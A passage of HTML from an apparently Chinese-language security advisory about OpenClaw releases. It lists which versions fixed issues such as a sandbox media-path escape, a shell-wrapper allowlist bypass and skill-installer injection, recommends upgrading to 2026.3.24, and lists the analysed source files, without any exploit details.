100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.22-beta.1</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 已具备本轮核心安全补丁，</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.22</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 是其稳定版发布，继承了 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">beta.1</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 的主要安全修复，但仍存在部分安全问题（Canvas 匿名访问、非管理员 session reset、shell-wrapper allowlist 绕过），在 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.23</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 中修复。</span></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.23</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 额外修补了 Canvas 匿名访问、非管理员 session reset、shell-wrapper positional carrier allowlist 绕过以及 Diagnostics 缓存追踪凭据泄露四个问题。</span></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.24</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 是</span><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">当前最新完整修复版本</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">，进一步修补了沙箱媒体路径逃逸（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">mediaUrl</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">/</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">fileUrl</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 别名绕过）和 skill 安装器元数据注入与 URL 协议滥用两个新发现的安全问题。</span></p></li></ul><h3 data-line="217" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">推荐升级路径</span></h3><p data-line="219" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">任意旧版本 → 直接升级至 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.24</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">（推荐）</span></strong></p><p data-line="221" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">无需经过中间版本，直接升级至 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.24</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 即可获得本轮所有安全修复。</span></p><hr style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="225" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2.5em auto 1.5em;padding: 0.3em 1.2em;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: block;width: fit-content;color: rgb(255, 255, 255);background: rgb(0, 82, 217);border-radius: 6px;box-shadow: none;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">06 参考链接</span></h2><ul style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px 0px 0px 1.5em;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;list-style-type: disc;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">OpenClaw GitHub Releases：<a href="https://github.com/openclaw/openclaw/releases" target="_blank">https://github.com/openclaw/openclaw/releases</a></span></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">OpenClaw CHANGELOG：仓库根目录 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">CHANGELOG.md</span></code></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">本报告分析的关键文件：</span></p></li><ul style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px 0px 0px 1.5em;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;list-style-type: disc;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/plugins/config-state.ts</span></code></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/infra/device-bootstrap.ts</span></code></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">extensions/telegram/src/webhook.ts</span></code></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/gateway/server/ws-connection/message-handler.ts</span></code></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/media/fetch.ts</span></code></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/infra/exec-approvals-allowlist.ts</span></code></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/gateway/server/http-auth.ts</span></code></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/gateway/server-methods/agent.ts</span></code></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/infra/diagnostics/cache-trace.ts</span></code></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/media/dispatch.ts</span></code></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/skills/installer.ts</span></code></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/control-ui/markdown-preview.ts</span></code></p></li></ul></ul></div><div class="wx-theme" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px 0px 24px;padding: 20px 16px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Roboto, &#34;Helvetica Neue&#34;, Arial, &#34;Noto Sans&#34;, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;letter-spacing: normal;text-align: start;background-color: rgb(255, 255, 255);font-size: 16px;line-height: 1.6;visibility: visible;" data-pm-slice="0 0 []"><p data-line="360" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 